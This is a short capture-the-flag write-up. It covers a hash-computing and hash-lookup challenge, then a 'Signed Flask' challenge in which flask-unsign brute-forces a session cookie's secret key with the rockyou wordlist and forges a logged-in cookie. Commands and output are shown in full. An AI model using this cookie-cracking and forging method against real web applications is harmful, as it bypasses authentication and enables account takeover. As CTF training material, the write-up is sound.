Hashes

we have to follow the instructions

the md5 sum for “CSCTF” is 542dc648d5c62e61bd1f30a63b1c6dbe. we put that into ctf.txt.

to calculate the sha256 hash of the file we use sha256. we get 3c2d667f257c3d1ddeba049fe1f723cec9a0de6c438d744285d24cbd81a897d1.

to crack the hash we can use an online database that checks the hash if it has been cracked previously. we get #winner. the sha1 hash of this is 22124982b891828006f9d759f32a8b01352c70df. we put that on a new line inside ctf.txt and get 7602e0234d40319989e8c1c14349403b1fba145ee081322b04115e85b7197db1fa0e318dd9715ce7fa5518e8f9bc4af2e2a4b399fb6604292590734cbbce4ab6.

easy, right?

Signed Flask

based on the description we have to crack the session cookie found on the site such that we cand sign with the same password a {'logged_in': True} cookie to feed back into the browser. we do as follows:

flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie "eyJsb2dnZWRfaW4iOmZhbHNlfQ.ZgjXBQ.xY8gCZc84swJmK7IadguxeQuWYo" --no-literal-eval
[*] Session decodes to: {'logged_in': False}
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 2171264 attemptscas
b'98765432123456789'

the password is 98765432123456789. we can then sign a new cookie with this password:

flask-unsign --sign --cookie "{'logged_in': True}" --secret "98765432123456789" --no-literal-eval
eyJsb2dnZWRfaW4iOnRydWV9.ZgvywQ.dJ-IPPotPxE6_cd1bYjYJkZjGW0

replacing this in the browser we have broke in :)

but to remember all we had to do was to get the SECRET_KEY and that is 98765432123456789.

check out the next section WEB